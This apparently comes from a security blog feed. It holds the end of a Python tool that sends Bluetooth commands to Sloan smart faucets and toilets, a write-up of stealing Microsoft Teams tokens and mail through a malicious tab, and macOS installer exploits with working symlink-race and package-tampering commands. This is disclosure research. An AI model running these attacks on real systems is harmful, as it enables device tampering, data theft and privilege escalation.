UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_TURBINE_RESULT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c964");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_VALVE_RESULT = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c963");
DIAG = (
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_DATE_OF_DIAGNOSTIC,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_INIT,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_SENSOR_RESULT,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_TURBINE_RESULT,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_VALVE_RESULT,
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_COMMUNICATION_STATUS,
UUID_CHARACTERISTIC_FAUCET_DIAGNOSTIC_SOLAR_STATUS,
)
UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88361");
UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_PRODUCTION_ENABLE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c971");
UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_ADAPTIVE_SENSING_ENABLE = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c978");
UUID_CHARACTERISTIC_BATTERY_LEVEL = UUID("00002a19-0000-1000-8000-00805f9b34fb");
UUID_CHARACTERISTIC_FAUCET_BD_BATTERY_LEVEL = UUID("00002a19-0000-1000-8000-00805f9b34fb");
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC = UUID("d0aba888-fb10-4dc9-9b17-bdd8f490c966");
UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_BATTERY_LEVEL_AT_DIAGNOSTIC = UUID("f89f13e7-83f8-4b7c-9e8b-364576d88364");
BATTERY_INFO = (
UUID_CHARACTERISTIC_BATTERY_LEVEL,
UUID_CHARACTERISTIC_FAUCET_BD_BATTERY_LEVEL,
UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_BATTERY_LEVEL_AT_DIAGNOSTIC,
UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_BATTERY_LEVEL_AT_DIAGNOSTIC,
)
ATTACKS_DICT = {
"0": ("Dispense Water", UUID_CHARACTERISTIC_FAUCET_BD_FAUCET_DIAGNOSTIC_WATER_DISPENSE, "Enter a 1 to begin Dispensing water: "),
"1": ("Flush Toilet", UUID_CHARACTERISTIC_FLUSHER_DIAGNOSIS_ACTIVATE_VALVE_ONCE, "Enter a 1 to begin flushing diagnostic: "),
"2": ("Change Faucet Flow Rate", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_FLOW_RATE, "Enter two digits together, they'll be a float (11 will be 1.1lpm): "),
"3": ("Change Faucet Activation Mode", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MODE_SELECTION, "Enter a 0 (ondemand) or a 1 (metered) to change the activation mode.: "),
"4": ("Change Faucet OnDemand Run Time", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_MAXIMUM_ON_DEMAND_RUN_TIME, "Enter 2 digits (10 = 10 seconds): "),
"5": ("Change Faucet Metered Run Time", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_METERED_RUN_TIME, "Enter 3 digits (120 = 120 seconds): "),
"6": ("Change Sensor Range", UUID_CHARACTERISTIC_FAUCET_BD_SETTINGS_CONFIG_SENSOR_RANGE, "Enter 1 digit (0 to disable sensor): "),
"7": ("Read Maintenance Personnel Info", FAUCET_PHONE_UUIDS, "N/A"),
"8": ("Change Model Number", UUID_CHARACTERISTIC_FAUCET_BD_DEVICE_INFO_MODEL_NUMBER, "Enter a new model number: "),
"9": ("OTA (doesn't write)", OTA, "N/A"),
"10": ("Read HW", UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_HARDWARE_VERSION, "N/A"),
"11": ("Read FW", UUID_CHARACTERISTIC_FAUCET_AD_BD_INFO_AD_FIRMWARE_VERSION, "N/A"),
"12": ("Read AQUIS Info", AQUIS_UUIDS, "N/A"),
"13": ("Read Locking Information", LOCK_INFO, "N/A"),
"14": ("Read Diagnostic Info", DIAG, "N/A"),
"15": ("Read NOTES", NOTES, "N/A"),
"16": ("Write NOTES", NOTES, "Enter something to write to the 4 notes fields:"),
"17": ("Production Enable", UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_PRODUCTION_ENABLE, "Write something to production enable: "),
"18": ("Adaptive Sensing Enable (gain/sensitivity changes not implemented)", UUID_CHARACTERISTIC_FAUCET_BD_PRODUCTION_MODE_ADAPTIVE_SENSING_ENABLE, "Write to Adaptive Sensing Enable: "),
"19": ("Read Battery Info", BATTERY_INFO, "N/A"),
}
class ScanDelegate(DefaultDelegate):
def __init__(self):
DefaultDelegate.__init__(self)
#def handleDiscovery(self, dev):
#if dev
def convert_num_for_writing(text):
if len(text) > 4:
return text.encode()
output = b''
#for letter in text:
# output = output + str(hex(ord(letter)))[2:4].encode()
output = text.encode()
return output
def run_sink_flood(attack, target, p):
attack_name = attack[0]
uuid = attack[1]
text = attack[2]
target_name = target["name"]
if type(uuid) == UUID:
char = p.getCharacteristics(uuid=uuid)
if char[0].supportsRead() and attack_name != "Dispense Water":
val = char[0].read()
print(f"[ >] {target_name} responds with current value: {val}")
if not text == "N/A":
sendme = input(text)
sendme = convert_num_for_writing(sendme)
char[0].write(sendme, withResponse=True)
else:
for i in uuid:
try:
char = p.getCharacteristics(uuid=i)
if char[0].supportsRead():
val = char[0].read()
print(f"[ >] {target_name} responds with current value: {val}")
if not text == "N/A":
sendme = input(text)
sendme = convert_num_for_writing(sendme)
char[0].write(sendme, withResponse=True)
except BTLEGattError:
pass
def menu_pick_attack(target):
for attack in ATTACKS_DICT.keys():
print(f"[{attack}] {ATTACKS_DICT[attack][0]}")
selection = input("Enter a #: ")
return ATTACKS_DICT[selection]
def menu_pick_device(devices):
menu = {}
i = 1
target = None
for dev in devices:
for (adtype, desc, value) in dev.getScanData():
if desc == "Complete Local Name":
if type(value) == str and "FAUCET" in value:
menu["%s" % i] = {"name": value,"dev": dev}
i += 1
options = menu.keys()
if not options:
return None
sorted(options)
for entry in options:
print(f"[{entry}] {menu[entry]['dev'].addr} {menu[entry]['name']} ")
selection = input("Enter a device #: ")
if selection in menu.keys():
target = menu[selection]
return target
def lescan():
scanner = Scanner(1).withDelegate(ScanDelegate())
try:
print(f"[*] scanning for {SCAN_TIMEOUT}")
devices = scanner.scan(SCAN_TIMEOUT)
except BTLEManagementError:
print("[*] Permission to use HCI unavailable, rerun with sudo or as root.")
return
return devices
def main():
print("[*] starting SINK FLOOD Sloan SmartFaucet and SmartFlushometer tool")
while True:
found_devices = lescan()
if found_devices:
target = menu_pick_device(found_devices)
if not target:
continue
p = Peripheral(target['dev'].addr)
#p = Peripheral('08:6b:d7:20:9d:4b')
while target:
attack = menu_pick_attack(target)
run_sink_flood(attack, target, p)
else:
print("[*] target not found. have you tried turning it off and on again?")
continue
else:
print("[*] something's not write. exiting.")
exit()
if __name__ == "__main__":
main()

Plumbing the Depths of Sloan’s Smart Bathroom Fixture Vulnerabilities was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs

14 June 2021 at 13:03

Trading up a small bug for a big impact

Intro

I recently came across an interesting bug in the Microsoft Power Apps service which, despite its simplicity, can be leveraged by an attacker to gain persistent read/write access to a victim user’s email, Teams chats, OneDrive, Sharepoint and a variety of other services by way of a malicious Microsoft Teams tab and Power Automate flows. The bug has since been fixed by Microsoft, but in this blog we’re going to see how it could have been exploited.

In the following sections, we’ll take a look at how we, as baduser(at)fakecorp.ca, a member of the fakecorp.ca organization, can create a malicious Teams tab and use it to eventually steal emails, Teams messages, and files from gooduser(at)fakecorp.ca, and send emails and messages on their behalf. While the attack we will look at has a lot of moving parts, it is fairly serious, as the compromise of business email is said to have cost victims $1.8 billion in 2020.

As an example to get us started, here is a quick clip of this method being used by Bad User to steal a Word document from Good User’s private OneDrive for Business.

Teams Tabs, Power Apps and Power Automate Flows

If you are already familiar with Teams and the Power Platform, feel free to skip this section, but otherwise, it may be useful to go over the pieces of the puzzle we’ll be using later.

Microsoft Teams has a default feature that allows a user to launch small applications as a tab in any team they are part of. If that user is part of an Office 365/Teams organization with a Business Basic license or above, they also have access to a set of Teams tabs which consist of Microsoft Power Apps applications.

A Teams tab with the Bulletins Power App

Power Apps are part of the wider Microsoft Power Platform, and when a user of a particular team launches their first Power App tab, it creates what Microsoft calls a “Dataverse for Teams Environment”, which according to Microsoft “is used to store, manage, and share team-specific data, apps, and flows”.

It should also be noted that, apart from the team-specific environments, there is a default environment for the organization as a whole. This is important because users can only create connectors and flows in either the default environment, or for teams which they own, and the attack we’re going to look at requires the ability to create Power Automate flows.

Power Automate is a service which lets users create automated workflows which can operate on their Office 365 organization’s data. For example, these flows can be used to do things like send emails on a particular schedule, or send Microsoft Teams messages any time a file on Sharepoint is updated.

Power Automate flow templates

The bug: trusting a bad domain

When a Power App tab is first created for a team, it runs through a deployment process that uses information gathered from the make.powerapps.com domain to install the application to the team dataverse/environment.

Installing the app

Teams tabs generally operate by opening an iframe to a page on a domain which is specified as trusted in that application’s manifest. What we see in the above image is a tab that contains an iframe to the page apps.powerapps.com/teams/makerportal?makerPortalUrl=https://make.powerapps.com/somePageHere, which itself is opening an iframe to the make.powerapps.com page passed in makerPortalUrl.

Immediately upon seeing this I was curious if I could make the apps.powerapps.com page load our own content. I noticed a couple of things:

  1. The apps.powerapps.com page will only load the iframe to makerPortalUrl if it is in a Microsoft Teams tab (it uses the Microsoft Teams javascript client sdk).
  2. The child iframe would only load if the makerPortalUrl begins with https://make.powerapps.com

We can see this happen if we view the page’s source, testing out different parameters. Trying to load any url which doesn’t begin with https://make.powerapps.com results in the makerPortalUrl being set to an empty string. However, the validation stops at checking whether the domain begins with make.powerapps.com, and does not check whether it is the full domain.

So, if we set makerPortalUrl equal to something like https://make.powerapps.com.fakecorp.ca/ we will be able to load our own content in the iframe!

Cool, we can load an iframe with our own content two iframes deep in a Teams tab, but what does that get us? Microsoft Teams already has a website tab type which lets you load an iframe with a URL of your choosing, and with those you can’t do much. Fortunately for us, some tabs have more capabilities than others.

Stealing auth tokens with postMessage

We can load our own content in an iframe, which itself is sitting in an iframe on apps.powerapps.com. The reason this is more interesting than something like the Website tab type on Teams is that for Power App extension tab types, the app.powerapps.com page communicates both with Teams, by way of the Teams JS SDK, as well as its child iframe using javascript postMessage.

We can communicate with the parent window via postMessage

Using a Chrome extension, we can watch the postMessages passed between windows as an application is installed and launched. At first glance, the most interesting message is a postMessage from make.powerapps.com in the innermost window (the window which we are replacing when specifying our own makerPortalUrl) to the apps.powerapps.com window, with GET_ACCESS_TOKEN in the data.

The frame which we were replacing was getting access tokens from its parent window without passing any sort of authentication.

the child iframe requesting an access token via postMessage

I tested this same kind of postMessage from the make.powerapps.com.fakecorp.ca subdomain, and sure enough, I was able to grab the same access tokens. A handler is registered in the WebPlayer.EmbedMakerPortal.js file loaded by apps.powerapps.com which fetches tokens for the requested resource using the https://apps.powerapps.com/auth/onbehalfof endpoint, which in our testing is capable of grabbing tokens for:

- apihub.azure.com
- graph.microsoft.com
- dynamics apps subdomains
- service.flow.microsoft.com
- service.powerapps.com
Grabbing the access token from a page we control

This is a super exciting thing to see: A tab under our control which can be created in a public team can retrieve access tokens on behalf of the user viewing it. Let’s slow down for a moment though, because I forgot to show an important step: how did we get our own content in a tab in the first place?

Overwriting a Teams tab

I mentioned earlier that Teams tabs generally operate by opening an iframe to a page which is specified in the tab application’s manifest. The request to define what page is loaded by a tab can be seen when adding a new tab or even renaming a currently existing tab.

The PUT request for renaming a tab lets us change the tab url

The url being given in this PUT request is pointing to the Bulletins Power App which is installed in our team environment. To point the tab to our malicious content we simply have to replace that url with our apps.powerapps.com/teams/makerportal?makerPortalUrl=https://make.powerapps.com.fakecorp.ca page.

It should be noted that this only works because we are passing a url with a trusted domain (apps.powerapps.com) according to the application’s manifest. If we try to pass malicious content directly as the tab’s url, the tab will not load our content.

A short and inconspicuous proof of concept

While the attacks we will look at later are longer and overly noisy for demonstration purposes, let’s consider a very quick proof of concept of how we could use what we currently have to steal access tokens from unsuspecting users.

If we host a page similar to the following and overwrite a tab to point to it, we can grab users’ service.flow.microsoft.com token and send it to another listener we control, while also loading the original Power App in an iframe that matches the tab size. While it won’t look exactly like a normally-running Power App tab, it doesn’t look different enough to notice. If the application requires postMessage communication with the parent app, we could even act as a man-in-the-middle for the postMessages being sent and received by adding a message handler to the PoC.

During the loading you can see two spinning circles. The smaller one is our JS running.

Now that we know we can steal certain tokens, let’s see what we can do with them, specifically the service.flow.microsoft.com token we just stole.

Stealing more tokens, emails, messages and files

The reason we’re focused on the service.flow.microsoft.com token is because it can be used to get us access to more tokens, and to create Power Automate flows, which will allow us to access a user’s email from Outlook, Teams messages, files from OneDrive and SharePoint, and a whole lot more.

We will construct the attack, at a high level, by:

- Grabbing an extra set of tokens from api.flow.microsoft.com
- Creating connectors to the services we want to access.
- Consent on behalf of the victim user using first party logins
- Creating Power Automate flows on the victim user’s behalf which let us send/receive emails and teams messages, retrieve emails, messages and files.
- Adding ourselves (or a group we’re in) to the owners of the flow.
- Having the victim user send an email to us containing any information we need to access the flows.

For our example we’re going to be showing pieces of a proof of concept which creates:

- Office 365 (for outlook access), and Teams connectors
- A flow which lets us send emails as the user
- A flow which lets us get all Teams messages from channels the victim is in, and send messages on their behalf.

The api.flow.microsoft.com token bundle

The first stop on our quest to get access to everything the victim user holds dear is an api endpoint which will let us generate a handful of new access tokens. Sending an empty POST request to api.flow.microsoft.com/providers/Microsoft.ProcessSimple/environments/<environment>/users/me/onBehalfOfTokenBundle?api-version=2021–01–03 will let us grab the following tokens, with the following scopes:

the api.flow.microsoft.com token bundle
- graph.microsoft.com
- scope : Contacts.Read Contacts.Read.Shared Group.Read.All TeamsAppInstallation.ReadWriteForTeam TeamsAppInstallation.ReadWriteSelfForChat User.Read User.ReadBasic.All
- graph.microsoft.net
- scope : user_impersonation
- appservice.azure.com
- scope : user_impersonation
- apihub.azure.com
- scope : user_impersonation
- consent.msp.windows.net/logic-app-aad
- scope : user_impersonation
- service.powerapps.com
- scope : user_impersonation

Some of these tokens will become useful to us for constructing a larger attack (specifically the graph.microsoft.com and apihub.azure.com tokens).

Creating connectors and using first party logins

To create flows which let us take control of the victim’s services, we first need to create connectors for those services.

When a connector is created, a user can use a consent link to login via a login.microsoft.com popup and grant permissions for the service for which the connector is being made (like Office 365, Teams, or Sharepoint). Some connectors, however, come with a first party login url, which lets us bypass the regular interactive login process and authorize the connector using only the authorization tokens already gathered.

Creating a connector on the victim’s behalf takes only three requests, the final of which is a POST request to the first party login url, with the apihub.azure.com access token.

consenting to a connector with a stolen apihub.azure.com token

After this third request, the connector will be ready to use with any flow we create.

Creating a flow

Given the number of potential connector types, flow triggers, and actions we can perform, there are an endless number of ways that we could leverage this access. They range anywhere from simply forwarding every email which is received by the victim to the attacker, to only performing actions if a particular RSS feed updates, to creating REST endpoints that let us trigger any number of different actions in different services.

Additionally, if the organization happens to have premium Power Apps/Automate licensing, there are many more options available. It is honestly a very useful system (even if you’re not trying to exploit a whole Office 365 org).

For our attack, we will look at creating a flow which gives us access to endpoints which take JSON input, and perform the actions we want (send emails, teams messages, downloads files, etc). It is a noisier method, since it requires the attacker to send requests (authenticated as themselves), but it is convenient for demonstration. Not all flows require the attacker to be authenticated, or require user interaction.

Choosing flow triggers

A flow trigger is how a flow will be kicked off / knows when to begin. The three main types are automatic (when an email comes in, forward it to this address), instant (when a request is received at this endpoint, trigger the flow), and scheduled (run the flow every xyz seconds/minutes/hours).

The flow trigger we would prefer to use is the “when an HTTP request is received” trigger, which lets unauthenticated users trigger the flow, but that is a premium feature, so instead we will use the “Manually Trigger a Flow” trigger.

The trigger for our Microsoft Teams flow

This trigger requires authentication, but because it is assumed that the attacker is part of the organization this shouldn’t be a problem, and there are ways to limit information about who is running what flows.

Creating the flow logic

Flows allow you to create an automated process piece by piece, passing the outputs of one action to the next. For example, in the flow we created to let us get all Teams messages from a user, as well as send messages to any channel on their behalf, we determine what action to take, who to send the message to and other details depending on the input passed to the trigger.

Sending a message is quick and simple, but to retrieve all messages for all teams and channels, we first grab a list of all teams, then get each channel per team, then all messages per channel, and roll it up into one big gross ball and have the flow send it to the attacker via email.

The Teams flow for our PoC

Now that we have the flow created, we need to know how we can create it, and share it with ourselves as the attacker, using the tokens we’ve stolen and what those requests look like. Luckily in our case, it is just a couple of simple requests.

  1. A POST request, containing JSON object representing the flow, to create it and get the unique flow name.
  2. A GET request to grab the flow trigger uri, which will let us trigger the flow as the attacker once we have added ourselves to the owners group.

Adding a group to flow owners

For the trigger we chose, we need to be able to access the flow trigger uri, which can only be done by users who have access to the flow. As a result, we need to add a group we belong to (which seems less suspicious than just adding ourselves) to the flow owners.

The easiest choice here is some large, all-encompassing group, but in our case we’re using the group which is generated automatically for any team created in Microsoft Teams.

In order to grab the unique group id, we use the graph.microsoft.com token we stole from the victim earlier. We then modify the flow’s owners to include that group.

adding a group to the flow owners

Running the flow and sending ourselves the uris we need

In the proof of concept we’re building, we create a flow that lets us send emails on behalf of the victim user. This can be leveraged at the end of the attack to send ourselves the list of the flow trigger uris we need in order to perform the actions we want.

sending an email using the Outlook connector and flow we’ve created

For example, at the end of the email/Teams proof of concept we’re building, an email is sent on the victim’s behalf which sends us the flow trigger uris for both the Outlook and Teams flows we’ve created.

The message we receive from the victim with the flow trigger uris

Using these flow trigger uris, we can now read the victim’s emails and Teams messages, and send messages and emails on their behalf (despite being authenticated as Bad User).

Putting it all together

The “TL;DR” shot: actions the malicious tab performs on opening

There are a number of ways in which we could build an attack with this vulnerability. It is likely that the best way would be to only use javascript on the malicious tab to steal the service.flow.microsoft.com token, and then perform the rest of the actions from an attacker-controlled server, so we reduce the traffic being generated by the victims and aren’t cut off by them navigating away from the tab.

For our quick and dirty PoC however, we just perform the whole attack with one big javascript section in our malicious tab. The pseudocode for our attack looks like this:

Setting up a malicious tab with a payload like the one above will cause the victim to create connectors and flows, and add the attacker as an owner to them, as well as send them an email containing the flow trigger uris.

As a real example, here is a quick clip of a similar payload running and sending the attacker the victim’s Teams messages, and letting the attacker send a message to a private team masquerading as the victim.

stealing and sending Teams messages

Considerations for the attacker

If you’ve gone through the above and thought “cool, but it would be really easy for an admin to determine who is using these flows maliciously,” you’d be correct. However, there are a number of steps one could take to limit the exposure of the attacking user if a similar attack is being carried out in a penetration test.

  • Flows allow you to specify whether the inputs and outputs to each action should be kept secret / scrubbed from the flow’s run history. This means that it would be harder to observe what data is being taken, and where it is being sent.
  • Not all flows require the user to make authenticated requests to trigger. Low and slow methods like having flows trigger on a RSS feed update (30 minute minimum period), or on a schedule, or automatically (like when a new email comes in from any account, read the email body and perform those actions).
  • Running the attack as one long javascript payload isn’t ideal and takes too long in real situations. Just grabbing the service.flow.microsoft.com token and conducting the rest of the attack from an attacker-controlled machine would be much less conspicuous.
  • Flows can be used to creatively cover an attacker’s tracks. For example, if you exfiltrate data via email in a flow, you can add a final step which deletes any emails sent to the attacker’s mail from the Sent Items folder.

Considerations for org administrators

While it may be difficult to determine who in a team has set up a malicious tab, or what user is running the flows (if the inputs/outputs have been made secret), there is a potential indicator to identify whether a user has had malicious flows run on their behalf.

When a user logs into make.powerapps.com or flow.microsoft.com to create a flow, a Microsoft Power Automate free license is automatically added to their set of licenses (if they didn’t already have one assigned to them). However, when flows are created on a user’s behalf by a malicious tab, they don’t have the license assigned to them. This license status can be cross referenced with which users have flows created under their name at admin.powerplatform.microsoft.com

organization admin portal

Notice that Bad User has logged into the flow.microsoft.com web interface, but Good User, despite having flows in their name listed in admin.powerplatform.microsoft.com, does not show as having a license for Power Automate. This could indicate that the flows were not created intentionally by Good User.

Luckily, the attack is limited to authenticated users within a Teams organization who have the ability to create Power Apps tabs, which means it can’t just be exploited by an untrusted/unauthenticated attacker. However, the permission to create these tabs is enabled by default, so it may be a good idea to consider limiting apps by default and enable them on request.

Takeaways

While that was a long and not quite straightforward attack, the potential impact of such an attack could be huge, especially if it happens to hit an organization administrator. That such a small initial bug (the improper validation of the make.powerapps.com domain) could be traded-up until an attacker is exfiltrating emails, Teams messages, OneDrive and SharePoint files is definitely concerning. It means that even a small bug in a not-so-common service like Microsoft Power Apps could lead to the compromise of many other services by way of token bundles and first party logins for connectors.

So if you happen to find a small bug in one service, see how far you can take it and see if you can trade a small bug for a big impact. There are likely other creative and serious potential attacks we didn’t explore with all of the potential access tokens we were able to steal. Let me know if you spot one 🙂.

Thanks for reading!


Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

More macOS Installer Flaws

3 June 2021 at 13:02

Back in December, we wrote about attacking macOS installers. Over the last couple of months, as my team looked into other targets, we kept an eye on the installers of applications we were using and interacting with regularly. During our research, we noticed yet another of the aforementioned flaws in the Microsoft Teams installer and in the process of auditing it, discovered another generalized flaw with macOS package installers.

Frustrated by the prevalence of these issues, we decided to write them up and make separate reports to both Apple and Microsoft. We wrote to Apple to recommend implementing a fix similar to what they did for CVE-2020–9817 and explained the additional LPE mechanism discovered. We wrote to Microsoft to recommend a fix for the flaw in their installer.

Both companies have rejected these submissions and suggestions. Below you will find full explanations of these flaws as well as proofs-of-concept that can be integrated into your existing post-exploitation arsenals.

Attack Surface

To recap from the previous blog, macOS installers have a variety of convenience features that allow developers to customize the installation process for their applications. Most notable of these features are preinstall and postinstall scripts. These are scripts that run before and after the actual application files are copied to their final destination on a given system.

If the installer itself requires elevated privileges for any reason, such as setting up a system-level Launch Daemon for an auto-updater service, the installer will prompt the user for permission to elevate privileges to root. There is also the case of unattended installations automatically doing this, but we will not be covering that in this post.

The primary issue being discussed here occurs when these scripts — running as root — read from and write to locations that a normal, lower-privileged user has control over.

Issue 1: Usage of Insecure Directories During Elevated Installations

In July 2020, NCC Group posted their advisory for CVE-2020–9817. In this advisory, they discuss an issue where files extracted to Installer Sandbox directories retained the permissions of a lower-privileged user, even when the installer itself was running with root privileges. This means that any local attacker (local for code execution, not necessarily physical access) could modify these files and potentially escalate to root privileges during the installation process.

NCC Group conceded that these issues could be mitigated by individual developers, but chose to report the issue to Apple to suggest a more holistic solution. Apple appears to have agreed, provided a fix in HT211170, and assigned a CVE identifier.

Apple’s solution was simple: They modified files extracted to an installer sandbox to obtain the permissions of the user the installer is currently running as. This means that lower privileged users would not be able to modify these files during the installation process and influence actions performed by root.

Similar to the sandbox issue, as noted in our previous blog post, it isn’t uncommon for developers to use other less-secure directories during the installation process. The most common directories we’ve come across that fit this bill are /tmp and /Applications, which both have read/write access for standard users.

Let’s use Microsoft Teams as yet another example of this. During the installation process for Teams, the application contents are moved to /Applications as normal. The postinstall script creates a system-level Launch Daemon that points to the TeamsUpdaterDaemon application (/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon), which will run with root permissions. The issue is that if a local attacker is able to create the /Applications/Microsoft Teams directory tree prior to installation, they can overwrite the TeamsUpdaterDaemon application with their own custom payload during the installation process, which will be run as a Launch Daemon, and thus give the attacker root permissions. This is possible because while the installation scripts do indeed change the write permissions on this file to root-only, creating this directory tree in advance thwarts this permission change because of the open nature of /Applications.

The following demonstrates a quick proof of concept:

# Prep Steps Before Installing
/tmp ❯❯❯ mkdir -p “/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/”
# Just before installing, have this running. Inelegant, but it works for demonstration purposes.
# Payload can be whatever. It won’t spawn a GUI, though, so a custom dropper or other application would be necessary.
/tmp ❯❯❯ while true; do
ln -f -F -s /tmp/payload “/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon”;
done
# Run installer. Wait for the TeamUpdaterDaemon to be called.

The above creates a symlink to an arbitrary payload at the file path used in the postinstall script to create the Launch Daemon. During the installation process, this directory is owned by the lower-privileged user, meaning they can modify the files placed here for a short period of time before the installation scripts change the permissions to allow only root to modify them.

In our report to Microsoft, we recommended verifying the integrity of the TeamsUpdaterDaemon prior to creating the Launch Daemon entry or using the preinstall script to verify permissions on the /Applications/Microsoft Teams directory.

The Microsoft Teams vulnerability triage team has been met with criticism over their handling of vulnerability disclosures these last couple of years. We’d expected that their recent inclusion in Pwn2Own showcased vast improvements in this area, but unfortunately, their communications in this disclosure as well as other disclosures we’ve recently made regarding their products demonstrate that this is not the case.

Full thread: https://mobile.twitter.com/EyalItkin/status/1395278749805985792
Full thread: https://twitter.com/mattaustin/status/1200891624298954752
Full thread: https://twitter.com/MalwareTechBlog/status/1254752591931535360

In response to our disclosure report, Microsoft stated that this was a non-issue because /Applications requires root privileges to write to. We pointed out that this was not true and that if it was, it would mean the installation of any application would require elevated privileges, which is clearly not the case.

We received a response stating that they would review the information again. A few days later our ticket was closed with no reason or response given. After some prodding, the triage team finally stated that they were still unable to confirm that /Applications could be written to without root privileges. Microsoft has since stated that they have no plans to release any immediate fix for this issue.

Apple’s response was different. They stated that they did not consider this a security concern and that mitigations for this sort of issue were best left up to individual developers. While this is a totally valid response and we understand their position, we requested information regarding the difference in treatment from CVE-2020–9817. Apple did not provide a reason or explanation.

Issue 2: Bypassing Gatekeeper and Code Signing Requirements

During our research, we also discovered a way to bypass Gatekeeper and code signing requirements for package installers.

According to Gatekeeper documentation, packages downloaded from the internet or created from other possibly untrusted sources are supposed to have their signatures validated and a prompt is supposed to appear to authorize the opening of the installer. See the following quote for Apple’s explanation:

When a user downloads and opens an app, a plug-in, or an installer package from outside the App Store, Gatekeeper verifies that the software is from an identified developer, is notarized by Apple to be free of known malicious content, and hasn’t been altered. Gatekeeper also requests user approval before opening downloaded software for the first time to make sure the user hasn’t been tricked into running executable code they believed to simply be a data file.

In the case of downloading a package from the internet, we can observe that modifying the package will trigger an alert to the user upon opening it claiming that it has failed signature validation due to being modified or corrupted.

Failed signature validation for a modified package

If we duplicate the package and modify it, however, we can modify contained files at will and repackage it sans signature. Most users will not notice that the installer is no longer signed (the lock symbol in the upper right-hand corner of the installer dialog will be missing) since the remainder of the assets used in the installer will look as expected. This newly modified package will also run without being caught or validated by Gatekeeper (Note: The applications installed will still be checked by Gatekeeper when they are run post-installation. The issue presented here regards the scripts run by the installer.) and could allow malware or some other malicious actor to achieve privilege escalation to root. Additionally, this process can be completely automated by monitoring for .pkg downloads and abusing the fact that all .pkg files follow the same general format and structure.

The below instructions can be used to demonstrate this process using the Microsoft Teams installer. Please note that this issue is not specific to this installer/product and can be generalized and automated to work with any arbitrary installer.

To start, download the Microsoft Teams installation package here: https://www.microsoft.com/en-us/microsoft-teams/download-app#desktopAppDownloadregion

When downloaded, the binary should appear in the user’s Downloads folder (~/Downloads). Before running the installer, open a Terminal session and run the following commands:

# Rename the package
yes | mv ~/Downloads/Teams_osx.pkg ~/Downloads/old.pkg
# Extract package contents
pkgutil — expand ~/Downloads/old.pkg ~/Downloads/extract
# Modify the post installation script used by the installer
mv ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak
echo “#!/usr/bin/env sh\nid > ~/Downloads/exploit\n$(cat ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak)” > ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall
rm -f ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak
chmod +x ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall
# Repackage and rename the installer as expected
pkgutil -f --flatten ~/Downloads/extract ~/Downloads/Teams_osx.pkg

When a user runs this newly created package, it will operate exactly as expected from the perspective of the end-user. Post-installation, however, we can see that the postinstall script run during installation has created a new file at ~/Downloads/exploit that contains the output of the id command as run by the root user, demonstrating successful privilege escalation.

Demo of above proof of concept

When we reported the above to Apple, this was the response we received:

Based on the steps provided, it appears you are reporting Gatekeeper does not apply to a package created locally. This is expected behavior.

We confirmed that this is indeed what we were reporting and requested additional information based on the Gatekeeper documentation available:

Apple explained that their initial explanation was faulty, but maintained that Gatekeeper acted as expected in the provided scenario.

Essentially, they state that locally created packages are not checked for malicious content by Gatekeeper nor are they required to be signed. This means that even packages that require root privileges to run can be copied, modified, and recreated locally in order to bypass security mechanisms. This allows an attacker with local access to man-in-the-middle package downloads and escalates privileges to root when a package that does so is executed.

Conclusion and Mitigations

So, are these flaws actually a big deal? From a realistic risk standpoint, no, not really. This is just another tool in an already stuffed post-exploitation toolbox, though, it should be noted that similar installer-based attack vectors are actively being exploited, as is the case in recent SolarWinds news.

From a triage standpoint, however, this is absolutely a big deal for a couple of reasons:

  1. Apple has put so much effort over the last few iterations of macOS into baseline security measures that it seems counterproductive to their development goals to ignore basic issues such as these (especially issues they’ve already implemented similar fixes for).
  2. It demonstrates how much emphasis some vendors place on making issues go away rather than solving them.

